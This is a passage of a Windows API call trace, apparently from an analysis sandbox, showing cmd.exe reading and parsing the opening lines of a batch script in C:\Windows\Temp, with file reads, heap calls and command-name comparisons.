lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.541] SetFilePointer (in: hFile=0x88, lDistanceToMove=1172, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x494 [0174.541] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":: Re-launch the script with x64 process if it was initiated by x86 process on x64 bit Windows\r\n", cbMultiByte=96, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=":: Re-launch the script with x64 process if it was initiated by x86 process on x64 bit Windows\r\nShell\\v1.0\\;%PATH%\"\r\n=====================\r\n") returned 96 [0174.541] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.541] GetFileType (hFile=0x88) returned 0x1 [0174.541] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.541] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x494 [0174.541] GetProcessHeap () returned 0x19a8f1e0000 [0174.541] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.541] GetProcessHeap () returned 0x19a8f1e0000 [0174.541] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.542] _tell (_FileHandle=3) returned 1172 [0174.542] _close (_FileHandle=3) returned 0 [0174.542] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.542] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.542] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.542] SetFilePointer (in: hFile=0x88, lDistanceToMove=1172, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x494 [0174.542] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.542] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x494 [0174.542] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.542] SetFilePointer (in: hFile=0x88, lDistanceToMove=1256, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e8 [0174.543] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":: or with ARM64 process if it was initiated by x86/ARM32 process on ARM64 Windows\r\n", cbMultiByte=84, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=":: or with ARM64 process if it was initiated by x86/ARM32 process on ARM64 Windows\r\nit Windows\r\nShell\\v1.0\\;%PATH%\"\r\n=====================\r\n") returned 84 [0174.543] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.543] GetFileType (hFile=0x88) returned 0x1 [0174.543] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.543] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e8 [0174.543] GetProcessHeap () returned 0x19a8f1e0000 [0174.543] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.543] GetProcessHeap () returned 0x19a8f1e0000 [0174.543] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.543] _tell (_FileHandle=3) returned 1256 [0174.543] _close (_FileHandle=3) returned 0 [0174.544] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.544] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.544] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.544] SetFilePointer (in: hFile=0x88, lDistanceToMove=1256, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e8 [0174.544] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.544] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e8 [0174.544] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.544] SetFilePointer (in: hFile=0x88, lDistanceToMove=1258, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4ea [0174.544] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n or with ARM64 process if it was initiated by x86/ARM32 process on ARM64 Windows\r\nit Windows\r\nShell\\v1.0\\;%PATH%\"\r\n=====================\r\n") returned 2 [0174.544] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.544] GetFileType (hFile=0x88) returned 0x1 [0174.544] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.544] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4ea [0174.545] GetProcessHeap () returned 0x19a8f1e0000 [0174.545] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.545] GetProcessHeap () returned 0x19a8f1e0000 [0174.545] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.545] _tell (_FileHandle=3) returned 1258 [0174.545] _close (_FileHandle=3) returned 0 [0174.545] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.545] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.546] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.546] SetFilePointer (in: hFile=0x88, lDistanceToMove=1258, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4ea [0174.546] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.546] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4ea [0174.546] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.546] SetFilePointer (in: hFile=0x88, lDistanceToMove=1276, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4fc [0174.546] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"_cmdf=%~f0\"\r\n", cbMultiByte=18, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set \"_cmdf=%~f0\"\r\nrocess if it was initiated by x86/ARM32 process on ARM64 Windows\r\nit Windows\r\nShell\\v1.0\\;%PATH%\"\r\n=====================\r\n") returned 18 [0174.546] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.546] GetFileType (hFile=0x88) returned 0x1 [0174.546] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.546] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4fc [0174.546] GetProcessHeap () returned 0x19a8f1e0000 [0174.546] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.547] GetProcessHeap () returned 0x19a8f1e0000 [0174.547] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x54) returned 0x19a8f1f8c40 [0174.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd", nBufferLength=0x208, lpBuffer=0x43f9efe920, lpFilePart=0x43f9efe480 | out: lpBuffer="C:\\Windows\\Temp\\MAS_15344413.cmd", lpFilePart=0x43f9efe480*="MAS_15344413.cmd") returned 0x20 [0174.547] FindFirstFileW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), lpFindFileData=0x43f9efe1b0 | out: lpFindFileData=0x43f9efe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xe782115b, ftLastAccessTime.dwHighDateTime=0x1da42d4, ftLastWriteTime.dwLowDateTime=0xe782115b, ftLastWriteTime.dwHighDateTime=0x1da42d4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x19a8f1f86a0 [0174.547] FindClose (in: hFindFile=0x19a8f1f86a0 | out: hFindFile=0x19a8f1f86a0) returned 1 [0174.547] memcpy (in: _Dst=0x43f9efe926, _Src=0x43f9efe1dc, _Size=0xe | out: _Dst=0x43f9efe926) returned 0x43f9efe926 [0174.547] FindFirstFileW (in: lpFileName="C:\\Windows\\Temp" (normalized: "c:\\windows\\temp"), lpFindFileData=0x43f9efe1b0 | out: lpFindFileData=0x43f9efe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16b59ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3f3c25e5, ftLastAccessTime.dwHighDateTime=0x1da9886, ftLastWriteTime.dwLowDateTime=0x3f3c25e5, ftLastWriteTime.dwHighDateTime=0x1da9886, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0x19a8f1f86a0 [0174.579] FindClose (in: hFindFile=0x19a8f1f86a0 | out: hFindFile=0x19a8f1f86a0) returned 1 [0174.580] memcpy (in: _Dst=0x43f9efe936, _Src=0x43f9efe1dc, _Size=0x8 | out: _Dst=0x43f9efe936) returned 0x43f9efe936 [0174.580] FindFirstFileW (in: lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), lpFindFileData=0x43f9efe1b0 | out: lpFindFileData=0x43f9efe1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f3c25e5, ftCreationTime.dwHighDateTime=0x1da9886, ftLastAccessTime.dwLowDateTime=0x3f3c25e5, ftLastAccessTime.dwHighDateTime=0x1da9886, ftLastWriteTime.dwLowDateTime=0x3f4a7656, ftLastWriteTime.dwHighDateTime=0x1da9886, nFileSizeHigh=0x0, nFileSizeLow=0x6d9ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="MAS_15344413.cmd", cAlternateFileName="MAS_15~1.CMD")) returned 0x19a8f1f86a0 [0174.580] FindClose (in: hFindFile=0x19a8f1f86a0 | out: hFindFile=0x19a8f1f86a0) returned 1 [0174.580] _wcsnicmp (_String1="MAS_15~1.CMD", _String2="MAS_15344413.cmd", _MaxCount=0x10) returned 75 [0174.580] memcpy (in: _Dst=0x43f9efe940, _Src=0x43f9efe1dc, _Size=0x20 | out: _Dst=0x43f9efe940) returned 0x43f9efe940 [0174.580] GetProcessHeap () returned 0x19a8f1e0000 [0174.580] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x52) returned 0x19a8f1f8820 [0174.580] GetProcessHeap () returned 0x19a8f1e0000 [0174.581] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.581] _wcsicmp (_String1="set", _String2=")") returned 74 [0174.581] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0174.581] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0174.582] _wcsicmp (_String1="IF", _String2="set") returned -10 [0174.582] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0174.582] _wcsicmp (_String1="REM", _String2="set") returned -1 [0174.582] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0174.582] GetProcessHeap () returned 0x19a8f1e0000 [0174.582] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ece20 [0174.582] GetProcessHeap () returned 0x19a8f1e0000 [0174.582] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1e5950 [0174.582] GetProcessHeap () returned 0x19a8f1e0000 [0174.582] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x64) returned 0x19a8f1ecee0 [0174.582] _tell (_FileHandle=3) returned 1276 [0174.582] _close (_FileHandle=3) returned 0 [0174.582] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0174.582] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0174.582] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0174.582] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0174.582] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0174.582] _wcsicmp (_String1="set", _String2="CD") returned 16 [0174.582] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0174.583] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0174.583] _wcsicmp (_String1="set", _String2="REN") returned 1 [0174.583] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0174.583] _wcsicmp (_String1="set", _String2="SET") returned 0 [0174.583] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0174.583] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0174.583] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0174.583] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0174.583] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0174.584] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0174.584] _wcsicmp (_String1="set", _String2="CD") returned 16 [0174.584] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0174.584] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0174.584] _wcsicmp (_String1="set", _String2="REN") returned 1 [0174.584] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0174.584] _wcsicmp (_String1="set", _String2="SET") returned 0 [0174.584] GetProcessHeap () returned 0x19a8f1e0000 [0174.584] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb8) returned 0x19a8f1ecf50 [0174.584] GetProcessHeap () returned 0x19a8f1e0000 [0174.584] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ecf50, Size=0x64) returned 0x19a8f1ecf50 [0174.584] GetProcessHeap () returned 0x19a8f1e0000 [0174.584] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ecf50) returned 0x64 [0174.584] wcsncmp (_String1="\"_cm", _String2="/", _MaxCount=0x4) returned -13 [0174.584] GetProcessHeap () returned 0x19a8f1e0000 [0174.584] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x6c) returned 0x19a8f1ecfd0 [0174.584] _wcsnicmp (_String1="\"_", _String2="/A", _MaxCount=0x2) returned -13 [0174.584] _wcsnicmp (_String1="\"_", _String2="/P", _MaxCount=0x2) returned -13 [0174.584] SetEnvironmentVariableW (lpName="_cmdf", lpValue="C:\\Windows\\Temp\\MAS_15344413.cmd") returned 1 [0174.584] GetProcessHeap () returned 0x19a8f1e0000 [0174.585] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ed0b0) returned 1 [0174.585] GetEnvironmentStringsW () returned 0x19a8f1ea4b0* [0174.585] GetProcessHeap () returned 0x19a8f1e0000 [0174.585] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xae0) returned 0x19a8f1ed050 [0174.585] memcpy (in: _Dst=0x19a8f1ed050, _Src=0x19a8f1ea4b0, _Size=0xae0 | out: _Dst=0x19a8f1ed050) returned 0x19a8f1ed050 [0174.585] FreeEnvironmentStringsA (penv="=") returned 1 [0174.585] _get_osfhandle (_FileHandle=1) returned 0x24 [0174.586] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0174.587] _get_osfhandle (_FileHandle=1) returned 0x24 [0174.587] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0174.588] _get_osfhandle (_FileHandle=0) returned 0x20 [0174.588] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0174.588] SetConsoleInputExeNameW () returned 0x1 [0174.588] GetConsoleOutputCP () returned 0x1b5 [0174.589] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0174.589] SetThreadUILanguage (LangId=0x0) returned 0x409 [0174.589] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.590] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.590] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.590] SetFilePointer (in: hFile=0x88, lDistanceToMove=1276, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4fc [0174.590] GetProcessHeap () returned 0x19a8f1e0000 [0174.590] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecfd0) returned 1 [0174.590] GetProcessHeap () returned 0x19a8f1e0000 [0174.590] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecf50) returned 1 [0174.591] GetProcessHeap () returned 0x19a8f1e0000 [0174.591] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecee0) returned 1 [0174.591] GetProcessHeap () returned 0x19a8f1e0000 [0174.591] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5950) returned 1 [0174.591] GetProcessHeap () returned 0x19a8f1e0000 [0174.591] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ece20) returned 1 [0174.591] GetProcessHeap () returned 0x19a8f1e0000 [0174.592] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8820) returned 1 [0174.592] GetProcessHeap () returned 0x19a8f1e0000 [0174.592] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8c40) returned 1 [0174.593] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.593] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4fc [0174.593] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.593] SetFilePointer (in: hFile=0x88, lDistanceToMove=1298, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x512 [0174.593] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="for %%# in (%*) do (\r\n", cbMultiByte=22, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="for %%# in (%*) do (\r\nss if it was initiated by x86/ARM32 process on ARM64 Windows\r\nit Windows\r\nShell\\v1.0\\;%PATH%\"\r\n=====================\r\n") returned 22 [0174.593] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.593] GetFileType (hFile=0x88) returned 0x1 [0174.593] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.593] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x512 [0174.593] GetProcessHeap () returned 0x19a8f1e0000 [0174.593] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.593] GetProcessHeap () returned 0x19a8f1e0000 [0174.594] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.594] _wcsicmp (_String1="for", _String2=")") returned 61 [0174.594] _wcsicmp (_String1="FOR", _String2="for") returned 0 [0174.594] _wcsicmp (_String1="FOR/?", _String2="for") returned 47 [0174.594] GetProcessHeap () returned 0x19a8f1e0000 [0174.594] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ece20 [0174.594] GetProcessHeap () returned 0x19a8f1e0000 [0174.594] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4c) returned 0x19a8f1f86a0 [0174.595] GetProcessHeap () returned 0x19a8f1e0000 [0174.595] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb860 [0174.595] GetProcessHeap () returned 0x19a8f1e0000 [0174.595] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb860, Size=0x18) returned 0x19a8f1e5950 [0174.595] GetProcessHeap () returned 0x19a8f1e0000 [0174.595] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e5950) returned 0x18 [0174.595] _wcsicmp (_String1="/L", _String2="%#") returned 10 [0174.595] _wcsicmp (_String1="/D", _String2="%#") returned 10 [0174.595] _wcsicmp (_String1="/F", _String2="%#") returned 10 [0174.595] _wcsicmp (_String1="/R", _String2="%#") returned 10 [0174.595] _wcsicmp (_String1="IN", _String2="in") returned 0 [0174.595] _wcsicmp (_String1="DO", _String2="do") returned 0 [0174.595] GetProcessHeap () returned 0x19a8f1e0000 [0174.595] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ecee0 [0174.595] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.595] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x512 [0174.595] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efebc0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efebc0*=0x1fff, lpOverlapped=0x0) returned 1 [0174.596] SetFilePointer (in: hFile=0x88, lDistanceToMove=1326, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x52e [0174.596] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if /i \"%%#\"==\"r1\" set r1=1\r\n", cbMultiByte=28, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%#\"==\"r1\" set r1=1\r\nit was initiated by x86/ARM32 process on ARM64 Windows\r\nit Windows\r\nShell\\v1.0\\;%PATH%\"\r\n=====================\r\n") returned 28 [0174.596] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.596] GetFileType (hFile=0x88) returned 0x1 [0174.596] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.596] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x52e [0174.596] GetProcessHeap () returned 0x19a8f1e0000 [0174.596] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.596] GetProcessHeap () returned 0x19a8f1e0000 [0174.596] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.597] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0174.597] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0174.597] _wcsicmp (_String1="IF", _String2="if") returned 0 [0174.597] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0174.597] GetProcessHeap () returned 0x19a8f1e0000 [0174.597] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1e5e10 [0174.597] GetProcessHeap () returned 0x19a8f1e0000 [0174.597] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ec8e0 [0174.597] GetProcessHeap () returned 0x19a8f1e0000 [0174.597] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb710 [0174.597] GetProcessHeap () returned 0x19a8f1e0000 [0174.597] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb710, Size=0x1a) returned 0x19a8f1eb8c0 [0174.597] GetProcessHeap () returned 0x19a8f1e0000 [0174.597] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb8c0) returned 0x1a [0174.597] _wcsicmp (_String1="/i", _String2="/I") returned 0 [0174.597] GetProcessHeap () returned 0x19a8f1e0000 [0174.597] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1e5ed0 [0174.597] GetProcessHeap () returned 0x19a8f1e0000 [0174.597] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb800 [0174.597] _wcsicmp (_String1="ERRORLEVEL", _String2="\"%#\"") returned 67 [0174.597] _wcsicmp (_String1="EXIST", _String2="\"%#\"") returned 67 [0174.597] _wcsicmp (_String1="CMDEXTVERSION", _String2="\"%#\"") returned 65 [0174.597] _wcsicmp (_String1="DEFINED", _String2="\"%#\"") returned 66 [0174.598] _wcsicmp (_String1="NOT", _String2="\"%#\"") returned 76 [0174.598] GetProcessHeap () returned 0x19a8f1e0000 [0174.598] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb9e0 [0174.598] GetProcessHeap () returned 0x19a8f1e0000 [0174.598] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb860 [0174.598] _wcsicmp (_String1="set", _String2=")") returned 74 [0174.598] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0174.598] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0174.598] _wcsicmp (_String1="IF", _String2="set") returned -10 [0174.598] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0174.598] _wcsicmp (_String1="REM", _String2="set") returned -1 [0174.598] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0174.598] GetProcessHeap () returned 0x19a8f1e0000 [0174.598] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1e5f90 [0174.598] GetProcessHeap () returned 0x19a8f1e0000 [0174.598] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 